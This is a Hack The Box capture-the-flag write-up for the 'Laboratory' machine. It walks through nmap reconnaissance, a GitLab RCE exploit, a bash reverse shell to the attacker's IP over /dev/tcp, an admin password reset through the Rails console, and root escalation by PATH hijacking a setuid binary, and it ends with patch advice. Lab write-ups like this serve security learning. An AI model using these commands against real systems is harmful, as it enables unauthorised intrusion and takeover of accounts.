Hackthebox Laboratory WriteUp
Overview:
Laboratory is an easy and fun machine. It exploits vulnerable gitlab by the buildin function Rails console, this a command line on gitlab to interact with gitlab over commands such as changing user’s password. The foothold is to take advantage of Rails console by changing admin dexter’s password and find his ssh key on his git repository. After got into the shell, there is a vulneravle docker-secuetiy execuable file that runs with root privilege. By running lstrace that we are able to see its looking for chmod exeucable on the machine through a path. The last PriEsc is to change its path to have code execution. With all that being said, let’s just jump in!
Reconnaissance:
root@kali:~/htb/boxes/laboratory# nmap -A -T4 -p- -oN all -v 10.10.10.216PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 25:ba:64:8f:79:9d:5d:95:97:2c:1b:b2:5e:9b:55:0d (RSA)
| 256 28:00:89:05:55:f9:a2:ea:3c:7d:70:ea:4d:ea:60:0f (ECDSA)
|_ 256 77:20:ff:e9:46:c0:68:92:1a:0b:21:29:d1:53:aa:87 (ED25519)
80/tcp open http Apache httpd 2.4.41
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Did not follow redirect to https://laboratory.htb/
443/tcp open ssl/http Apache httpd 2.4.41 ((Ubuntu))
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: 400 Bad Request
| ssl-cert: Subject: commonName=laboratory.htb
| Subject Alternative Name: DNS:git.laboratory.htb
| Issuer: commonName=laboratory.htb
| Public Key type: rsa
| Public Key bits: 4096
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2020-07-05T10:39:28
| Not valid after: 2024-03-03T10:39:28
| MD5: 2873 91a5 5022 f323 4b95 df98 b61a eb6c
|_SHA-1: 0875 3a7e eef6 8f50 0349 510d 9fbf abc3 c70a a1ca
| tls-alpn:
|_ http/1.1
Service Info: Host: laboratory.htb; OS: Linux; CPE: cpe:/o:linux:linux_kernel
There are two domains laboratory.htb and git.laboratory.htb, add them /etc/hosts file then head over to those web servers.
The foothold:
The laboratory.htb has some usernames, other than that, there are not much information out there. So, Let’s check another domain git.laboratory.htb. And its a gitlab of their server. This might be interesting.
Registered an account like xxx@laboratory.htb then logged in. On the help tab there is Gitlab’s version.
Searched exploit for this version , there is a rce exploit
change domain and port in the exploit script and run the exploit.
bash -c "bash -i >& /dev/tcp/10.10.14.12/443 0>&1"Got a shell and use reverse shell to have a new stable shell. Poking around but not find anything useful, So I’m going to change user password by Rails console then login to that user’s account at Gitlab. Detailed about Rails console are in below’s link.
git@git:/home$ gitlab-rails console
--------------------------------------------------------------------------------
GitLab: 12.8.1 (d18b43a5f5a) FOSS
GitLab Shell: 11.0.0
PostgreSQL: 10.12
--------------------------------------------------------------------------------
irb(main):002:0> user = User.first
user = User.first
=> #<User id:1 @dexter>
irb(main):003:0> user.password = 'secret_pass'
user.password = 'secret_pass'
=> "secret_pass"
irb(main):004:0> user.password_confirmation = 'secret_pass'
user.password_confirmation = 'secret_pass'
=> "secret_pass"
irb(main):005:0> user.save!
user.save!
Enqueued ActionMailer::DeliveryJob (Job ID: b4adbcfa-bd62-4b77-97b3-c1ec1faa0d07) to Sidekiq(mailers) with arguments: "DeviseMailer", "password_change", "deliver_now", #<GlobalID:0x00007f11e445c3b8 @uri=#<URI::GID gid://gitlab/User/1>>
=> true
irb(main):006:0>
root@kali:~/htb/boxes/laboratory# ssh -i key dexter@10.10.10.216
dexter@laboratory:~$ ls
user.txtPriEsc to root:
Poking around and the hint on the gitlab indicates there is a docker-security file. It runs as root privilege and its executable. Use ltrace to see what it’s doing and we can see its looking for chmod executable on the machine through a path. So, let’s change the path using PATH variable (details are in below’s blog )
dexter@laboratory:/usr/local/bin$ cd /tmp
dexter@laboratory:/tmp$ echo "/bin/bash" > chmod
dexter@laboratory:/tmp$ chmod 777 chmod
dexter@laboratory:/tmp$ echo $PATH
/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/snap/bin
dexter@laboratory:/tmp$ export PATH=/tmp:$PATH
dexter@laboratory:/tmp$ cd -
/usr/local/bin
dexter@laboratory:/usr/local/bin$ ./docker-security
root@laboratory:/usr/local/bin# id&hostname
[1] 183179
laboratory
root@laboratory:/usr/local/bin# uid=0(root) gid=0(root) groups=0(root),1000(dexter)Patch the vulnerabilities:
- Update gitlab version.
- Remove the docker-security exeutable or make a secure path for it.
